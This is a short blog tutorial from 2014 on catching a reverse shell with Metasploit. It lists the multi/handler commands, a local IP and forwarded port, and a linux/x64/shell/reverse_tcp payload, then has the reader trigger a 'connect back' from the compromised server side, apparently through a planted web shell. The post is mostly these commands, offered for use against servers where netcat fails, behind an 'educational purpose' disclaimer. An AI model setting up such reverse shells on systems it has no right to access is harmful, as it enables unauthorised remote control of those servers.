Thursday, February 27, 2014

Back Connecting With MetasPloit

Salam Friends

NOTE:- This tutorial is only for educational purpose.

Today i will show you how to back connect with MetasPloit , as i found it better then back connecting with netcat because some server are not connecting with NETCAT while connected with MetasPloit.

i have already forward my port for My Backtrack  & it is 3333 in my case.My local IP is 192.168.1.3.

NOTE: if you are on vpn then switch it OFF

Run MetasPloit & give following commands
>use exploit/multi/handler
>set lhost  192.168.1.3
>set lport 3333

Now time is to select payload .. here you have to check your server operation system
like i have linux x86_64 , so i will set this payload

>set payload linux/x64/shell/reverse_tcp

>exploit

Payload handler will b started in your metasploit .

now go to your server side & click connect back with port (3333) with your global Ip

after clicking on connect you will get reverse shell in Metasploit.

 Regards
Gujjar(pcp)

1 comments: